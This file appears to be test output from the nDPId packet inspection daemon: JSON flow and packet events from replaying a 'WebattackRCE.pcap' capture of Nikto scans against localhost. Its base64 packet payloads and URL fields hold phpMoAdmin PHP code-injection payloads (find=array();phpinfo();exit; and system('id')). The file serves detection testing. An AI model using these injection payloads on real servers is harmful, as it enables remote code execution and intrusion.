-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":772,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":772,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277974,"flow_last_seen":1576420277974,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277974,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51152,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00893{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":772,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":772,"flow_packet_id":1,"flow_last_seen":1576420277974,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277974,"pkt":"AAAAAAAAAAAAAAAACABFAAFncRdAAEAGynd\/AAABfwAAAcfQH5DeNEhBp6LH9oAYAED\/WwAAAQEICp1m\/\/2dZv\/9R0VUIC93dS1tb2FkbWluL21vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcwMTEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpDb250ZW50LUxlbmd0aDogMjINCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpIb3N0OiAxMjcuMC4wLjENCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} -01134{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":772,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":772,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277974,"flow_last_seen":1576420277974,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277974,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51152,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wu-moadmin\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":773,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":773,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277975,"flow_last_seen":1576420277975,"flow_idle_time":7440000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277975,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51154,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00890{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":773,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":773,"flow_packet_id":1,"flow_last_seen":1576420277975,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":370,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":370,"pkt_l4_len":336,"thread_ts_msec":1576420277975,"pkt":"AAAAAAAAAAAAAAAACABFAAFkoPRAAEAGmp1\/AAABfwAAAcfSH5BFc5mo+BaB54AYAED\/WAAAAQEICp1m\/\/+dZv\/\/R0VUIC9tb2FkbWluL21vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29udGVudC1MZW5ndGg6IDIyDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzAxMSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} -01131{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":773,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":773,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277975,"flow_last_seen":1576420277975,"flow_idle_time":7440000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277975,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51154,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/moadmin\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":774,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":774,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277976,"flow_last_seen":1576420277976,"flow_idle_time":7440000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":299,"midstream":1,"thread_ts_msec":1576420277976,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51156,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00878{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":774,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":774,"flow_packet_id":1,"flow_last_seen":1576420277976,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":365,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":365,"pkt_l4_len":331,"thread_ts_msec":1576420277976,"pkt":"AAAAAAAAAAAAAAAACABFAAFfD0hAAEAGLE9\/AAABfwAAAcfUH5ChoTYRo2DY7oAYAED\/UwAAAQEICp1nAACdZwAAR0VUIC93dS1tb2FkbWluLnBocD9jb2xsZWN0aW9uPXNlY3B1bHNlJmFjdGlvbj1saXN0Um93cyZmaW5kPWFycmF5KCk7cGhwaW5mbygpO2V4aXQ7IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA3MDExKQ0KQ29udGVudC1MZW5ndGg6IDIyDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KSG9zdDogMTI3LjAuMC4xDQoNCm9iamVjdD0xO3N5c3RlbSgnaWQnKTs="} -01125{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":774,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":774,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277976,"flow_last_seen":1576420277976,"flow_idle_time":7440000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":299,"midstream":1,"thread_ts_msec":1576420277976,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51156,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":775,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":775,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277977,"flow_last_seen":1576420277977,"flow_idle_time":7440000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420277977,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51158,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00894{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":775,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":775,"flow_packet_id":1,"flow_last_seen":1576420277977,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":376,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":376,"pkt_l4_len":342,"thread_ts_msec":1576420277977,"pkt":"AAAAAAAAAAAAAAAACABFAAFqZD5AAEAG101\/AAABfwAAAcfWH5DMOF1rGOgpBIAYAED\/XgAAAQEICp1nAAGdZwABR0VUIC9waHBtb2FkbWluL3d1LW1vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcwMTEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpDb250ZW50LUxlbmd0aDogMjINCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpIb3N0OiAxMjcuMC4wLjENCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} -01137{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":775,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":775,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277977,"flow_last_seen":1576420277977,"flow_idle_time":7440000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420277977,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51158,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpmoadmin\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":776,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":776,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277980,"flow_last_seen":1576420277980,"flow_idle_time":7440000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420277980,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51160,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00894{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":776,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":776,"flow_packet_id":1,"flow_last_seen":1576420277980,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":376,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":376,"pkt_l4_len":342,"thread_ts_msec":1576420277980,"pkt":"AAAAAAAAAAAAAAAACABFAAFqHXJAAEAGHhp\/AAABfwAAAcfYH5AZXiQoPHeXDoAYAED\/XgAAAQEICp1nAASdZwAER0VUIC93dS1tb2FkbWluL3d1LW1vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcwMTEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpDb250ZW50LUxlbmd0aDogMjINCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpIb3N0OiAxMjcuMC4wLjENCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} -01137{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":776,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":776,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277980,"flow_last_seen":1576420277980,"flow_idle_time":7440000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420277980,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51160,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wu-moadmin\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":777,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":777,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277981,"flow_last_seen":1576420277981,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277981,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51162,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00890{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":777,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":777,"flow_packet_id":1,"flow_last_seen":1576420277981,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277981,"pkt":"AAAAAAAAAAAAAAAACABFAAFn7phAAEAGTPZ\/AAABfwAAAcfaH5CzPtfCPnznp4AYAED\/WwAAAQEICp1nAAWdZwAFR0VUIC9tb2FkbWluL3d1LW1vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzAxMSkNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpDb250ZW50LUxlbmd0aDogMjINCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} -01134{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":777,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":777,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277981,"flow_last_seen":1576420277981,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277981,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51162,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/moadmin\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":778,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":778,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277983,"flow_last_seen":1576420277983,"flow_idle_time":7440000,"flow_min_l4_payload_len":296,"flow_max_l4_payload_len":296,"flow_tot_l4_payload_len":296,"flow_avg_l4_payload_len":296,"midstream":1,"thread_ts_msec":1576420277983,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51164,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00874{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":778,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":778,"flow_packet_id":1,"flow_last_seen":1576420277983,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":362,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":362,"pkt_l4_len":328,"thread_ts_msec":1576420277983,"pkt":"AAAAAAAAAAAAAAAACABFAAFcKzdAAEAGEGN\/AAABfwAAAcfcH5CIchJjnARiwIAYAED\/UAAAAQEICp1nAAedZwAHR0VUIC9tb2FkbWluLnBocD9jb2xsZWN0aW9uPXNlY3B1bHNlJmFjdGlvbj1saXN0Um93cyZmaW5kPWFycmF5KCk7cGhwaW5mbygpO2V4aXQ7IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA3MDExKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQ29udGVudC1MZW5ndGg6IDIyDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KSG9zdDogMTI3LjAuMC4xDQoNCm9iamVjdD0xO3N5c3RlbSgnaWQnKTs="} -01122{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":778,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":778,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277983,"flow_last_seen":1576420277983,"flow_idle_time":7440000,"flow_min_l4_payload_len":296,"flow_max_l4_payload_len":296,"flow_tot_l4_payload_len":296,"flow_avg_l4_payload_len":296,"midstream":1,"thread_ts_msec":1576420277983,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51164,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":779,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":779,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277984,"flow_last_seen":1576420277984,"flow_idle_time":7440000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":299,"midstream":1,"thread_ts_msec":1576420277984,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51166,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00878{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":779,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":779,"flow_packet_id":1,"flow_last_seen":1576420277984,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":365,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":365,"pkt_l4_len":331,"thread_ts_msec":1576420277984,"pkt":"AAAAAAAAAAAAAAAACABFAAFfNJZAAEAGBwF\/AAABfwAAAcfeH5DptA3NjIJEK4AYAED\/UwAAAQEICp1nAAidZwAIR0VUIC93dS1tb2FkbWluLnBocD9jb2xsZWN0aW9uPXNlY3B1bHNlJmFjdGlvbj1saXN0Um93cyZmaW5kPWFycmF5KCk7cGhwaW5mbygpO2V4aXQ7IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA3MDExKQ0KQ29udGVudC1MZW5ndGg6IDIyDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KSG9zdDogMTI3LjAuMC4xDQoNCm9iamVjdD0xO3N5c3RlbSgnaWQnKTs="} -01125{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":779,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":779,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277984,"flow_last_seen":1576420277984,"flow_idle_time":7440000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":299,"midstream":1,"thread_ts_msec":1576420277984,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51166,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":780,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":780,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277986,"flow_last_seen":1576420277986,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277986,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51168,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00890{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":780,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":780,"flow_packet_id":1,"flow_last_seen":1576420277986,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277986,"pkt":"AAAAAAAAAAAAAAAACABFAAFn4zdAAEAGWFd\/AAABfwAAAcfgH5C+u9puvhX1U4AYAED\/WwAAAQEICp1nAAqdZwAKR0VUIC9waHBtb2FkbWluL21vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkNvbnRlbnQtTGVuZ3RoOiAyMg0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcwMTEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} -01134{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":780,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":780,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277986,"flow_last_seen":1576420277986,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277986,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51168,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpmoadmin\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":781,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":781,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277988,"flow_last_seen":1576420277988,"flow_idle_time":7440000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420277988,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51170,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 